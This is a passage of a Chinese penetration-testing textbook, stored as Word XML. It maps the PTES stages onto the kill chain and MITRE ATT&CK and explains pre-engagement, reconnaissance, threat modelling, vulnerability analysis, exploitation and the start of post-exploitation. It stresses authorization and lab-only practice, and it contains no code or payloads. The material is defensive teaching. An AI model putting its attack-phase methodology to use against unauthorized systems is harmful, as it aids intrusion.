        <w:t xml:space="preserve">矩阵作为攻击阶段地图：杀伤链以七阶段线性模型（侦察→武器化→投递→利用→安装→命令控制→目标行动）描述一次入侵的宏观过程；ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则以战术×技术的二维矩阵刻画攻击者的行为剖面。从这个视角审视，PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的七阶段模型恰好位于杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的上游——它回答的是“渗透测试作为一个项目，从合同签署到最终报告，生命周期应该如何管理”。三者的关系可以这样理解：PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">定义测试项目的阶段框架；杀伤链为每一阶段的攻击行为提供时间线模型；ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则为具体的技术选择提供行为知识库。三者配合使用，形成“流程→阶段→技术”的三级映射体系。下面用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">图展示这一完整生命周期。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flowchart TD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> subgraph </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES流程</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A[前期交互]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B[情报收集]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">C[威胁建模]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D[漏洞分析]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">E[利用]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F[后渗透]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">G[报告]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> subgraph </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">杀伤链映射</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B -.-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CKL1[侦察]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D -.-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CKL3[投递]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E -.-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CKL4[利用]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E -.-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CKL5[安装]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F -.-&gt; CKL6[C2]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F -.-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CKL7[目标行动]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> subgraph </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK映射</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT1[侦察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0043]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT2[初始访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0001]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT3[执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0002]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT4[持久化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0003]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT5[横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0008]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT6[收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0009]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">七阶段详解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将一次完整的渗透测试划分为七个阶段，每个阶段都有明确的输入、输出和质量门控。这一划分源于渗透测试社区的长期实践共识，其权威性来自对真实项目失败经验的系统总结——大多数测试事故（越界、漏报、报告不被采纳）都可以追溯到某个阶段的工作缺失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段一：前期交互（Pre-engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Interactions）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是渗透测试真正的起点，也是决定项目成败和法律安全的关键环节。本阶段的核心产出是签署后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档与书面授权书。主要内容包括：确定测试目标与范围（哪些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段、域名、子网、物理设施属于测试范围；哪些系统明确列为“禁区”）；约定测试时间窗（例如仅限工作日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22:00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至次日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">06:00，或周末全天，避免影响业务高峰期）；明确测试类型（黑盒/白盒/灰盒，是否提供测试账号）；规定禁止动作清单（不得对生产数据库执行破坏性操作、不得利用社会工程攻击高管、不得植入持久化后门等）；约定应急联系人与通信方式（一旦测试引发意外宕机，能够在最短时间内通报并协助恢复）；数据处理与保密条款（测试过程中获取的敏感数据如何存储、传输、销毁）。从法律角度看，这份文档是测试者的“护身符”——没有书面授权的渗透测试，无论在技术上如何精妙，本质上都是非法入侵。本书所有后续章节的靶机实操均假定读者已在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搭建的隔离实验室中完成环境准备，且已自行拟定一份书面的“自授权”RoE（哪怕只是给实验室内的靶机写一页目标清单——这一练习本身即为本节习题的迁移任务）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二：情报收集（Intelligence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Gathering）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是渗透测试中投入时间最长、对后续阶段影响最大的环节。情报收集分为被动收集（不直接与目标系统交互，通过搜索引擎、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公共记录、Shodan、whois、证书透明度日志、社交媒体等公开渠道获取信息）与主动收集（直接向目标发送探测包，如端口扫描、服务版本探测、目录枚举）。从杀伤链视角看，情报收集对应杀伤链的“侦察”阶段与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance（TA0043）战术。但与真实攻击不同，授权渗透测试中的情报收集有明确边界——RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中可能规定某些网段不得扫描、某些信息源不受查询（例如不得通过社交工程获取员工凭据）。本书卷二（信息收集与侦察）将详细展开被动与主动情报收集的具体技术与工具，此处仅说明该阶段在生命周期中的位置与方法论要求：输出一份结构化的目标资产清单，包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址、域名、开放端口、服务版本、技术栈指纹、已知子域、关联邮箱与用户名。该清单的质量直接决定威胁建模的准确性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段三：威胁建模（Threat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modeling）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">情报收集回答“目标是什么”，威胁建模回答“目标可能以何种方式被入侵”。这一阶段将收集到的资产信息与攻击者的能力、动机、常用技术进行匹配，识别出最有可能被利用的攻击向量。在方法论层面，威胁建模的常用技术包括攻击树（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tree）分析、STRIDE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模型（Spoofing/Tampering/Repudiation/信息披露/拒绝服务/权限提升）以及基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的对手行为模拟（Adversary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Emulation，详见本书卷五）。威胁建模的产出是一份优先排序的攻击向量清单，为后续漏洞分析划定了重点范围——在有限的测试时间内，不可能对所有潜在漏洞逐一验证，必须根据威胁模型将资源集中到“最可能被真实对手利用”的路径上。这也是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区别于无差别批量扫描的关键：前者是风险驱动的、智能的；后者是盲目的、低效的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段四：漏洞分析（Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有了威胁模型指引的攻击向量，漏洞分析阶段开始对目标进行系统性的脆弱性发现。这一阶段既包括自动化扫描（使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nessus、OpenVAS、Nikto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具进行已知漏洞检测），也包括手工分析（基于情报收集阶段获取的服务版本信息，对照公开漏洞库如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NVD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行版本比对，以及对自定义应用进行逻辑漏洞分析）。本书卷三（Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全）将深入讲解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方向的手工漏洞分析技术，卷四（系统安全与二进制利用）则聚焦于操作系统与二进制层面的漏洞挖掘。需要特别注意的是，漏洞分析不等同于漏洞验证——在这一阶段，发现的只是“潜在”漏洞，大量扫描器输出包含误报（False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Positive），必须经过人工鉴别与优先级排序后方可进入利用阶段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段五：利用（Exploitation）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是渗透测试中最具攻击性的环节，也是本书“攻防对称”原则执行最严格的区域。利用阶段的目标是验证漏洞分析阶段发现的潜在漏洞是否确实可被利用，以此证明安全风险的现实存在。PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对利用阶段有一项关键约束：利用的目的是“证明风险”，而非“最大化破坏”——渗透测试不是真实攻击，一旦成功利用并获取访问权，应立即停止进一步破坏，转而记录证据并进入后渗透阶段。这与杀伤链中“利用→安装”的阶段转换形成清晰对应：攻击者在利用后通常安装后门以实现持久化，而渗透测试者的行为应当克制，不得安装非授权的持久化机制（除非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明确授权）。在此必须重申本书的武器化红线：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本节及后续所有利用章节仅限授权靶机环境（自建实验室</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / HackTheBox / TryHackMe / VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等官方授权平台），绝不提供可用于在野真实系统的完整武器化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于栈溢出、shellcode、提权等高级利用技术，仅在最小教学示例范围内讲解，且必须紧跟缓解机制说明（ASLR/NX/Canary/PIE——已见《从位到物联》Ch16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存保护机制，此处仅为攻防视角的应用）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段六：后渗透（Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一旦成功获取初始访问权限，后渗透阶段的目标是模拟真实攻击者在持久化、横向移动、权限提升、数据收集等方面的行为，以评估单一漏洞被利用后可能造成的最大业务影响。这一阶段与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵的多个战术直接对应：Persistence（TA0003</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化）、Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation（TA0004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升）、Lateral</w:t>
      </w:r>
